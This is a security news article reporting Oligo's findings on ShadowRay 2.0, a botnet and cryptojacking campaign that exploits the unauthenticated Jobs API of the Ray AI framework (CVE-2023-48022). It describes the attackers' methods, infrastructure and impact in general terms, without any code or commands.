Threat actors are exploiting a two-year-old vulnerability in the Ray AI framework in a fresh campaign that hit numerous clusters, Oligo reports.
Maintained by Anyscale, Ray is an open source framework for scaling Python-based AI and ML applications. Ray clusters can be deployed into the cloud to scale workloads, and should be secured and isolated in safe network environments, as the framework does not implement authentication.
The issue, tracked as CVE-2023-48022 (CVSS score of 9.8), allows remote, unauthenticated attackers to execute arbitrary code via the framework’s Jobs API.
Anyscale disputed the bug, pointing out that Ray’s documentation clearly states that clusters should not be used outside controlled network environments, but said last year it would implement login and authentication mechanisms in a future release.
However, it wasn’t until Oligo discovered that hundreds of Ray clusters had been compromised in a data-theft campaign dubbed ShadowRay that the maintainers revisited their stance on authentication.
Now, two years after CVE-2023-48022 was publicly disclosed and a year and a half after the ShadowRay campaign was discovered, multiple threat actors are exploiting Ray’s lack of authentication to abuse internet-accessible clusters, Oligo reports.
As part of the fresh campaign, dubbed ShadowRay 2.0, multiple threat actors have been abusing the flaw to take over computing resources as part of crypto-mining operations.
One adversary, named IronErn440, has been using Ray’s legitimate orchestration features to autonomously propagate their cryptojacking activity, Oligo says.
To evade detection, the attackers were seen limiting CPU usage, masquerading their tools as legitimate processes, and hiding GPU usage from monitoring tools. They have also deployed malware and abused legitimate code-sharing platforms for payload delivery.
The campaign, Oligo says, has been active since September 2024, building “a multi-purpose botnet capable of DDoS attacks, data exfiltration, and global autonomous propagation”.
In early November, the threat actors were abusing GitLab for payload staging, but migrated to GitHub after the initial repository was removed, and were seen immediately creating a new repository after the second one was removed.
As part of the GitLab-launched attacks, the threat actor used out-of-band platforms to automatically identify vulnerable targets, and then submitted malicious jobs to perform reconnaissance and execute Bash and Python payloads created using AI.
They moved laterally to all nodes in the cluster using Ray’s legitimate orchestration features, and deployed a multi-stage Python payload designed to identify cluster resources, calculate optimal allocation, and submit a takeover job using those resource requirements.
“The payloads from GitLab are likely to be AI-generated, based on its structure, comments, and error handling patterns. Attackers are now using AI to generate attack code targeting AI infrastructure,” Oligo notes.
The security firm also observed the deployment of multiple interactive reverse shells to AWS-hosted command-and-control (C&C) servers. The abundance of shells suggests either a sophisticated failover mechanism, or that multiple attackers could be targeting Ray clusters and competing for the resources.
The campaign specifically targeted clusters with NVIDIA GPUs for cryptojacking, and deployed multiple persistence tools and scripts to identify and terminate rival crypto-miners running on the compromised clusters.
Based on active commits in the IronErn440’s GitLab repository, Oligo believes that the threat actor was updating the payloads in real time. The updates would propagate across the network within hours.
“This is DevOps for cybercrime. Attackers used GitLab as their CI/CD pipeline for malware distribution. They can A/B test techniques, roll back failed updates, and respond to defensive measures – all through version control. The commit history showed active development in real time,” Oligo notes.
Additionally, the attackers abused the compromised clusters to steal credentials, providing them with root access to MySQL databases deployed in production. Tokens and cloud credentials were also found on the compromised workloads, as well as proprietary, custom models on some instances.
The threat actor also deployed a TCP state exhaustion tool called Sockstress, which suggests they could be weaponizing the Ray clusters for distributed denial-of-service (DDoS) attacks.
“Compromised Ray clusters were used to spray attack payloads to other Ray dashboards worldwide. The attackers essentially created a self-propagating worm that uses one victim to scan for and compromise the next victim,” Oligo notes.
After moving their infrastructure to GitHub, the attackers were seen compromising clusters with thousands of nodes and fully utilizing their CPUs for crypto-mining and updating their tools.
One of the compromised servers contained 240 gigabytes of source code, AI models, and datasheets, Oligo says.
The security firm’s scans uncovered more than 230,000 Ray servers accessible from the web. Many servers belonging to startups, research organizations, and AI environments have been compromised in this campaign.
Related: AI Is Supercharging Phishing: Here’s How to Fight Back
Related: Anthropic Says Claude AI Powered 90% of Chinese Espionage Campaign
Related: Many Forbes AI 50 Companies Leak Secrets on GitHub
Related: Follow Pragmatic Interventions to Keep Agentic AI in Check
